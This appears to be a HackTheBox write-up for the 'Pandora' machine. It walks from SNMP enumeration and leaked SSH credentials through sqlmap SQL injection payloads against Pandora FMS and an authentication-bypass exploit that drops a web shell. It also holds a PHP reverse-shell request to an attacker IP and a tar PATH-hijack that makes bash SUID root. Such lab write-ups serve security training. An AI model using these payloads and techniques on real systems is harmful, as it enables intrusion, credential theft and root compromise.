# Enumeration
## NMAP
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
- Apache 2.4.41
- Domain is `panda.htb`
- No robots.txt

## Gobuster
```sh
200      907l     2081w    33560c http://panda.htb/index.html                                                                                                                                                                         
301        9l       28w      307c http://panda.htb/assets
200      907l     2081w    33560c http://panda.htb/
```

- Nothing interesting was found in the source code the javascript files.

## NMAP
- Decided to scan for UDP ports and found a  port open
```nmap
PORT    STATE SERVICE REASON
161/udp open  snmp    udp-response ttl 63
```
- I used this [cheatsheet](https://pentestwiki.org/enumeration-cheat-sheet/) since I never done any SNMP enumeration.


# Foothold
## SNMP
```sh
$ snmp-check -v2c -c public 10.10.11.136 
```
- We're given a lot out of output like the hostname and the kernel version.
- While going through the output, it also shows proccess running and I found a particular one that is strange.
```sh
841                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
```
- Possible credentials
`daniel:HotelBabylon23`
- We can try to SSH into the box since port 22 is open using the credentials.
- And we can!
- Other than that, nothing else is interesting in the output

# Post-Exploit
- User `daniel` cannot run `sudo`
- Other user is `matt`

## Internal Enumeration
### Interesting Findings
```sh
Sudo version 1.8.31 
/var/www/pandora
/usr/bin/pandora_backup 
127.0.0.1:3306  
127.0.0.1:80
/etc/mysql/mariadb.cnf
```
- Checking out the port 80, it seems like they're is a pandora_console running locally. We can forward this to our machine
```sh
$ ssh 80:localhost:80 user@IP
```
- Now we can access it on our machine.
- There is a login page.
- We found credentials in `pandoradb_data.sql`
`admin:1da7ee7d45b96d0e1f45ee4ee23da560`
We can crack it and the password is `pandora`
- Attempt to login fails and I tried accessing the database using other usernames and password combos.

### Pandora FMS CVEs
- I decided to some research if there's more than 1 exploit to it.
- A known exploit is [this RCE](https://www.exploit-db.com/exploits/48280) but it requires authentications.
- Doing more research, I stumbled upon [PandoraFMS offical CVE page](http://www.pandorafms.org/en/security/common-vulnerabilities-and-exposures/).
- Searching for `unauthenticated` I found an interesting CVE which is [CVE-2020-26518](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26518)


#### Exploit
- It allows unauthenticated user to conduct SQL injection at `pandora_console/include/chart_generator.php session_id parameter.`
- Checking it our machine it does give out an error! 
`localhost/pandora_console/include/chart_generator.php?session_id=1'`
```sql
: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 1' at line 1 ('SELECT * FROM tsessions_php WHERE `id_session` = '1'' LIMIT 1') in
```

## SQL Injection
- Let's send the URL to SQLMAP for it to be automated.
```sql
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-7799' OR 4576=4576#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=1' OR (SELECT 6322 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(6322=6322,1))),0x7162707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNIA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=1' AND (SELECT 7638 FROM (SELECT(SLEEP(5)))wRsm)-- tIyz

```
And it found it!
- Now we can try to look around for valid credentials.
- Earlier we found the SQL scripts in `/var/www/pandora` , since we know the table that holds user credentials is `tusuario`, we can directly use that.
```sh
sqlmap -u 'localhost/pandora_console/include/chart_generator.php?session_id=1' --batch -D pandora -T tusuario --dump 
```
- And we can find matt's password and user
```sql
matt@pandora.htb   | <blank> | <blank>  | 0        | Matt     | 0        | <blank>  | f655f807365b6dc602b31ab3d6d43acc 
```
- Possible credentials 
`matt:f655f807365b6dc602b31ab3d6d43acc`

## Privilege Escalation
- Attempt to crack was unsuccessful.
- Looking again at the list of CVEs I found [CVE-2021-32099](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32099)
- It allows unauthenticated user to bypass the login page.
- Soon I found a written exploit on [Github](https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated?ref=pythonawesome.com)
- It allows us to run commands upload a reverse shell.
```txt
URL:  http://localhost:80/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : nc7gl0jloe77ishpv7vr055m3v
[+] Sending Payload 
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://localhost:80/pandora_console/images/shell.php?test=
```
`http://localhost/pandora_console/images/shell.php?test=id`
```sh
uid=1000(matt) gid=1000(matt) groups=1000(matt)
```
- Now let's get a reverse shell.
```http
GET /pandora_console/images/shell.php?test=php+-r+'$sock%3dfsockopen("10.10.14.89",9001)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=btpnimsgu8i5rqjb5qa91suf6h
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

```
- We are now user `matt`
- Checking for `sudo -l` we get some weird output.
```sh
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
```

- Earlier we saw that  user matt can run `/usr/bin/pandora_backup`.  And the binary is also a SUID
```sh
-rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup
```
- So it should run as user `root` if called from the absolute PATH.
- But we keep getting an error running it
```sh
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
```
- Perhaps it's our shells.
- We can try creating SSH-keys to SSH into the box.
- For this I use a simple script by [PinkDraconian](https://github.com/PinkDraconian/CTF-bash-tools/blob/master/scripts/ctf-ssh.sh) which creates SSH keys for boxes 
- We should be able to SSH to user matt after following the script.
- Now we should be able to run the binary
```sh
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
```
- Now we saw in the error that it was using `tar` , we try to check the binary incase there was some mistakes.

```sh
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/* Backup failed!
```
- We get a glimpse of the command being ran. Since it's not running tar from it's absolute path, we can try for PATH Hijacking.
- First, create a malicious version of `tar`, i'll be simply making it set `/bin/bash` as a SUID
```sh
chmod 4777 /bin/bash
```
- Now set it as executable and add it to the PATH
```sh
EXPORT PATH=/home/matt:$PATH
```
- Now when we run the binary, it should use our malicious version of `tar` and set `/bin/bash` as SUID
```sh
matt@pandora:~$ ls -la /bin/bash
-rwsrwxrwx 1 root root 1183448 Jun 18  2020 /bin/bash
bash-5.0# cat root.txt 
2527ed02452fda1e9069a5265d1efac9

```
